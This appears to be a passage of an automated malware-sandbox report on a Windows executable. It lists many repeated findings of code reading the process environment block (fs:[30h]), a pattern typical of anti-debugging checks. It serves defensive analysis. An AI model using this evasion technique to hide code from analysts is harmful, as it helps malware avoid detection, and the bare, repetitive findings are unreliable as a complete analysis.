          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0140E420 mov eax, dword ptr fs:[00000030h]2_2_0140E420
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0140C427 mov eax, dword ptr fs:[00000030h]2_2_0140C427
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01496420 mov eax, dword ptr fs:[00000030h]2_2_01496420
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01496420 mov eax, dword ptr fs:[00000030h]2_2_01496420
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01496420 mov eax, dword ptr fs:[00000030h]2_2_01496420
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01496420 mov eax, dword ptr fs:[00000030h]2_2_01496420
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01496420 mov eax, dword ptr fs:[00000030h]2_2_01496420
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01496420 mov eax, dword ptr fs:[00000030h]2_2_01496420
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01496420 mov eax, dword ptr fs:[00000030h]2_2_01496420
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014104E5 mov ecx, dword ptr fs:[00000030h]2_2_014104E5
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014CA49A mov eax, dword ptr fs:[00000030h]2_2_014CA49A
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014164AB mov eax, dword ptr fs:[00000030h]2_2_014164AB
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014444B0 mov ecx, dword ptr fs:[00000030h]2_2_014444B0
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0149A4B0 mov eax, dword ptr fs:[00000030h]2_2_0149A4B0
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0144674D mov esi, dword ptr fs:[00000030h]2_2_0144674D
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0144674D mov eax, dword ptr fs:[00000030h]2_2_0144674D
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0144674D mov eax, dword ptr fs:[00000030h]2_2_0144674D
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01410750 mov eax, dword ptr fs:[00000030h]2_2_01410750
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0149E75D mov eax, dword ptr fs:[00000030h]2_2_0149E75D
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01452750 mov eax, dword ptr fs:[00000030h]2_2_01452750
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01452750 mov eax, dword ptr fs:[00000030h]2_2_01452750
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01494755 mov eax, dword ptr fs:[00000030h]2_2_01494755
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01418770 mov eax, dword ptr fs:[00000030h]2_2_01418770
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01420770 mov eax, dword ptr fs:[00000030h]2_2_01420770
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01420770 mov eax, dword ptr fs:[00000030h]2_2_01420770
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01420770 mov eax, dword ptr fs:[00000030h]2_2_01420770
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01420770 mov eax, dword ptr fs:[00000030h]2_2_01420770
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01420770 mov eax, dword ptr fs:[00000030h]2_2_01420770
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01420770 mov eax, dword ptr fs:[00000030h]2_2_01420770
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01420770 mov eax, dword ptr fs:[00000030h]2_2_01420770
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01420770 mov eax, dword ptr fs:[00000030h]2_2_01420770
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01420770 mov eax, dword ptr fs:[00000030h]2_2_01420770
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01420770 mov eax, dword ptr fs:[00000030h]2_2_01420770
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01420770 mov eax, dword ptr fs:[00000030h]2_2_01420770
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01420770 mov eax, dword ptr fs:[00000030h]2_2_01420770
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0144C700 mov eax, dword ptr fs:[00000030h]2_2_0144C700
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01410710 mov eax, dword ptr fs:[00000030h]2_2_01410710
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01440710 mov eax, dword ptr fs:[00000030h]2_2_01440710
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0144C720 mov eax, dword ptr fs:[00000030h]2_2_0144C720
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0144C720 mov eax, dword ptr fs:[00000030h]2_2_0144C720
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0144273C mov eax, dword ptr fs:[00000030h]2_2_0144273C
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0144273C mov ecx, dword ptr fs:[00000030h]2_2_0144273C
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0144273C mov eax, dword ptr fs:[00000030h]2_2_0144273C
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0148C730 mov eax, dword ptr fs:[00000030h]2_2_0148C730
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0141C7C0 mov eax, dword ptr fs:[00000030h]2_2_0141C7C0
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014907C3 mov eax, dword ptr fs:[00000030h]2_2_014907C3
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0149E7E1 mov eax, dword ptr fs:[00000030h]2_2_0149E7E1
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014327ED mov eax, dword ptr fs:[00000030h]2_2_014327ED
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014327ED mov eax, dword ptr fs:[00000030h]2_2_014327ED
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014327ED mov eax, dword ptr fs:[00000030h]2_2_014327ED
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014147FB mov eax, dword ptr fs:[00000030h]2_2_014147FB
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014147FB mov eax, dword ptr fs:[00000030h]2_2_014147FB
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014B678E mov eax, dword ptr fs:[00000030h]2_2_014B678E
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014C47A0 mov eax, dword ptr fs:[00000030h]2_2_014C47A0
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014107AF mov eax, dword ptr fs:[00000030h]2_2_014107AF
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0142C640 mov eax, dword ptr fs:[00000030h]2_2_0142C640
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014D866E mov eax, dword ptr fs:[00000030h]2_2_014D866E
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014D866E mov eax, dword ptr fs:[00000030h]2_2_014D866E
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0144A660 mov eax, dword ptr fs:[00000030h]2_2_0144A660
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0144A660 mov eax, dword ptr fs:[00000030h]2_2_0144A660
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01442674 mov eax, dword ptr fs:[00000030h]2_2_01442674
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0148E609 mov eax, dword ptr fs:[00000030h]2_2_0148E609
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0142260B mov eax, dword ptr fs:[00000030h]2_2_0142260B
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0142260B mov eax, dword ptr fs:[00000030h]2_2_0142260B
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0142260B mov eax, dword ptr fs:[00000030h]2_2_0142260B
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0142260B mov eax, dword ptr fs:[00000030h]2_2_0142260B
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0142260B mov eax, dword ptr fs:[00000030h]2_2_0142260B
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0142260B mov eax, dword ptr fs:[00000030h]2_2_0142260B
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0142260B mov eax, dword ptr fs:[00000030h]2_2_0142260B
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01452619 mov eax, dword ptr fs:[00000030h]2_2_01452619
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01446620 mov eax, dword ptr fs:[00000030h]2_2_01446620
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01448620 mov eax, dword ptr fs:[00000030h]2_2_01448620
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0142E627 mov eax, dword ptr fs:[00000030h]2_2_0142E627
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0141262C mov eax, dword ptr fs:[00000030h]2_2_0141262C
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0144A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0144A6C7
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0144A6C7 mov eax, dword ptr fs:[00000030h]2_2_0144A6C7
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014906F1 mov eax, dword ptr fs:[00000030h]2_2_014906F1
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014906F1 mov eax, dword ptr fs:[00000030h]2_2_014906F1
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0148E6F2 mov eax, dword ptr fs:[00000030h]2_2_0148E6F2
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0148E6F2 mov eax, dword ptr fs:[00000030h]2_2_0148E6F2
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0148E6F2 mov eax, dword ptr fs:[00000030h]2_2_0148E6F2
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0148E6F2 mov eax, dword ptr fs:[00000030h]2_2_0148E6F2
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01414690 mov eax, dword ptr fs:[00000030h]2_2_01414690
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01414690 mov eax, dword ptr fs:[00000030h]2_2_01414690
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0144C6A6 mov eax, dword ptr fs:[00000030h]2_2_0144C6A6
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014466B0 mov eax, dword ptr fs:[00000030h]2_2_014466B0
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014E4940 mov eax, dword ptr fs:[00000030h]2_2_014E4940
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01490946 mov eax, dword ptr fs:[00000030h]2_2_01490946
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01436962 mov eax, dword ptr fs:[00000030h]2_2_01436962
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01436962 mov eax, dword ptr fs:[00000030h]2_2_01436962
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01436962 mov eax, dword ptr fs:[00000030h]2_2_01436962
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0145096E mov eax, dword ptr fs:[00000030h]2_2_0145096E
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0145096E mov edx, dword ptr fs:[00000030h]2_2_0145096E
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0145096E mov eax, dword ptr fs:[00000030h]2_2_0145096E
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014B4978 mov eax, dword ptr fs:[00000030h]2_2_014B4978
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014B4978 mov eax, dword ptr fs:[00000030h]2_2_014B4978
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0149C97C mov eax, dword ptr fs:[00000030h]2_2_0149C97C
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0148E908 mov eax, dword ptr fs:[00000030h]2_2_0148E908
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0148E908 mov eax, dword ptr fs:[00000030h]2_2_0148E908
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01408918 mov eax, dword ptr fs:[00000030h]2_2_01408918
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01408918 mov eax, dword ptr fs:[00000030h]2_2_01408918
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0149C912 mov eax, dword ptr fs:[00000030h]2_2_0149C912
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014A892B mov eax, dword ptr fs:[00000030h]2_2_014A892B
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0149892A mov eax, dword ptr fs:[00000030h]2_2_0149892A
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014A69C0 mov eax, dword ptr fs:[00000030h]2_2_014A69C0
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0141A9D0 mov eax, dword ptr fs:[00000030h]2_2_0141A9D0
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0141A9D0 mov eax, dword ptr fs:[00000030h]2_2_0141A9D0
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0141A9D0 mov eax, dword ptr fs:[00000030h]2_2_0141A9D0
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0141A9D0 mov eax, dword ptr fs:[00000030h]2_2_0141A9D0
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0141A9D0 mov eax, dword ptr fs:[00000030h]2_2_0141A9D0
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0141A9D0 mov eax, dword ptr fs:[00000030h]2_2_0141A9D0
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014449D0 mov eax, dword ptr fs:[00000030h]2_2_014449D0
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014DA9D3 mov eax, dword ptr fs:[00000030h]2_2_014DA9D3
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0149E9E0 mov eax, dword ptr fs:[00000030h]2_2_0149E9E0
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014429F9 mov eax, dword ptr fs:[00000030h]2_2_014429F9
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014429F9 mov eax, dword ptr fs:[00000030h]2_2_014429F9
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014229A0 mov eax, dword ptr fs:[00000030h]2_2_014229A0
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014229A0 mov eax, dword ptr fs:[00000030h]2_2_014229A0
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014229A0 mov eax, dword ptr fs:[00000030h]2_2_014229A0
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014229A0 mov eax, dword ptr fs:[00000030h]2_2_014229A0
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014229A0 mov eax, dword ptr fs:[00000030h]2_2_014229A0
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014229A0 mov eax, dword ptr fs:[00000030h]2_2_014229A0
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014229A0 mov eax, dword ptr fs:[00000030h]2_2_014229A0
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014229A0 mov eax, dword ptr fs:[00000030h]2_2_014229A0
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014229A0 mov eax, dword ptr fs:[00000030h]2_2_014229A0
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014229A0 mov eax, dword ptr fs:[00000030h]2_2_014229A0
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014229A0 mov eax, dword ptr fs:[00000030h]2_2_014229A0
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014229A0 mov eax, dword ptr fs:[00000030h]2_2_014229A0
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014229A0 mov eax, dword ptr fs:[00000030h]2_2_014229A0
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014109AD mov eax, dword ptr fs:[00000030h]2_2_014109AD
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014109AD mov eax, dword ptr fs:[00000030h]2_2_014109AD
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014989B3 mov esi, dword ptr fs:[00000030h]2_2_014989B3
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014989B3 mov eax, dword ptr fs:[00000030h]2_2_014989B3
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014989B3 mov eax, dword ptr fs:[00000030h]2_2_014989B3
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01422840 mov ecx, dword ptr fs:[00000030h]2_2_01422840
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01440854 mov eax, dword ptr fs:[00000030h]2_2_01440854
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01414859 mov eax, dword ptr fs:[00000030h]2_2_01414859
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01414859 mov eax, dword ptr fs:[00000030h]2_2_01414859
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014A6870 mov eax, dword ptr fs:[00000030h]2_2_014A6870
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014A6870 mov eax, dword ptr fs:[00000030h]2_2_014A6870
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0149E872 mov eax, dword ptr fs:[00000030h]2_2_0149E872
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0149E872 mov eax, dword ptr fs:[00000030h]2_2_0149E872
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0149C810 mov eax, dword ptr fs:[00000030h]2_2_0149C810
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014B483A mov eax, dword ptr fs:[00000030h]2_2_014B483A
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014B483A mov eax, dword ptr fs:[00000030h]2_2_014B483A
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0144A830 mov eax, dword ptr fs:[00000030h]2_2_0144A830
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01432835 mov eax, dword ptr fs:[00000030h]2_2_01432835
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01432835 mov eax, dword ptr fs:[00000030h]2_2_01432835
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01432835 mov eax, dword ptr fs:[00000030h]2_2_01432835
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01432835 mov ecx, dword ptr fs:[00000030h]2_2_01432835
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01432835 mov eax, dword ptr fs:[00000030h]2_2_01432835
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01432835 mov eax, dword ptr fs:[00000030h]2_2_01432835
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0143E8C0 mov eax, dword ptr fs:[00000030h]2_2_0143E8C0
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014E08C0 mov eax, dword ptr fs:[00000030h]2_2_014E08C0
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014DA8E4 mov eax, dword ptr fs:[00000030h]2_2_014DA8E4
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0144C8F9 mov eax, dword ptr fs:[00000030h]2_2_0144C8F9
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0144C8F9 mov eax, dword ptr fs:[00000030h]2_2_0144C8F9
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01410887 mov eax, dword ptr fs:[00000030h]2_2_01410887
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0149C89D mov eax, dword ptr fs:[00000030h]2_2_0149C89D
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014C4B4B mov eax, dword ptr fs:[00000030h]2_2_014C4B4B
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014C4B4B mov eax, dword ptr fs:[00000030h]2_2_014C4B4B
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014B8B42 mov eax, dword ptr fs:[00000030h]2_2_014B8B42
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014A6B40 mov eax, dword ptr fs:[00000030h]2_2_014A6B40
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014A6B40 mov eax, dword ptr fs:[00000030h]2_2_014A6B40
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014DAB40 mov eax, dword ptr fs:[00000030h]2_2_014DAB40
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01408B50 mov eax, dword ptr fs:[00000030h]2_2_01408B50
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014E2B57 mov eax, dword ptr fs:[00000030h]2_2_014E2B57
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014E2B57 mov eax, dword ptr fs:[00000030h]2_2_014E2B57
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014E2B57 mov eax, dword ptr fs:[00000030h]2_2_014E2B57
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014E2B57 mov eax, dword ptr fs:[00000030h]2_2_014E2B57
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014BEB50 mov eax, dword ptr fs:[00000030h]2_2_014BEB50
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0140CB7E mov eax, dword ptr fs:[00000030h]2_2_0140CB7E
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014E4B00 mov eax, dword ptr fs:[00000030h]2_2_014E4B00
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0148EB1D mov eax, dword ptr fs:[00000030h]2_2_0148EB1D
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0148EB1D mov eax, dword ptr fs:[00000030h]2_2_0148EB1D
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0148EB1D mov eax, dword ptr fs:[00000030h]2_2_0148EB1D
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0148EB1D mov eax, dword ptr fs:[00000030h]2_2_0148EB1D
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0148EB1D mov eax, dword ptr fs:[00000030h]2_2_0148EB1D
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0148EB1D mov eax, dword ptr fs:[00000030h]2_2_0148EB1D
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0148EB1D mov eax, dword ptr fs:[00000030h]2_2_0148EB1D
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0148EB1D mov eax, dword ptr fs:[00000030h]2_2_0148EB1D
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0148EB1D mov eax, dword ptr fs:[00000030h]2_2_0148EB1D
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0143EB20 mov eax, dword ptr fs:[00000030h]2_2_0143EB20
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0143EB20 mov eax, dword ptr fs:[00000030h]2_2_0143EB20
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014D8B28 mov eax, dword ptr fs:[00000030h]2_2_014D8B28
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014D8B28 mov eax, dword ptr fs:[00000030h]2_2_014D8B28
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01430BCB mov eax, dword ptr fs:[00000030h]2_2_01430BCB
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01430BCB mov eax, dword ptr fs:[00000030h]2_2_01430BCB
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01430BCB mov eax, dword ptr fs:[00000030h]2_2_01430BCB
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01410BCD mov eax, dword ptr fs:[00000030h]2_2_01410BCD
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01410BCD mov eax, dword ptr fs:[00000030h]2_2_01410BCD
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01410BCD mov eax, dword ptr fs:[00000030h]2_2_01410BCD
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014BEBD0 mov eax, dword ptr fs:[00000030h]2_2_014BEBD0
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01418BF0 mov eax, dword ptr fs:[00000030h]2_2_01418BF0
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01418BF0 mov eax, dword ptr fs:[00000030h]2_2_01418BF0
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01418BF0 mov eax, dword ptr fs:[00000030h]2_2_01418BF0
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0149CBF0 mov eax, dword ptr fs:[00000030h]2_2_0149CBF0
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0143EBFC mov eax, dword ptr fs:[00000030h]2_2_0143EBFC
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01420BBE mov eax, dword ptr fs:[00000030h]2_2_01420BBE
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01420BBE mov eax, dword ptr fs:[00000030h]2_2_01420BBE
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014C4BB0 mov eax, dword ptr fs:[00000030h]2_2_014C4BB0
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014C4BB0 mov eax, dword ptr fs:[00000030h]2_2_014C4BB0
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01416A50 mov eax, dword ptr fs:[00000030h]2_2_01416A50
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01416A50 mov eax, dword ptr fs:[00000030h]2_2_01416A50
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01416A50 mov eax, dword ptr fs:[00000030h]2_2_01416A50
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01416A50 mov eax, dword ptr fs:[00000030h]2_2_01416A50
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01416A50 mov eax, dword ptr fs:[00000030h]2_2_01416A50
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01416A50 mov eax, dword ptr fs:[00000030h]2_2_01416A50
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01416A50 mov eax, dword ptr fs:[00000030h]2_2_01416A50
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01420A5B mov eax, dword ptr fs:[00000030h]2_2_01420A5B
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_01420A5B mov eax, dword ptr fs:[00000030h]2_2_01420A5B
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0144CA6F mov eax, dword ptr fs:[00000030h]2_2_0144CA6F
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0144CA6F mov eax, dword ptr fs:[00000030h]2_2_0144CA6F
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0144CA6F mov eax, dword ptr fs:[00000030h]2_2_0144CA6F
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_014BEA60 mov eax, dword ptr fs:[00000030h]2_2_014BEA60
          Source: C:\Users\user\Desktop\881SP1exr1.exeCode function: 2_2_0148CA72 mov eax, dword ptr fs:[00000030h]2_2_0148CA72
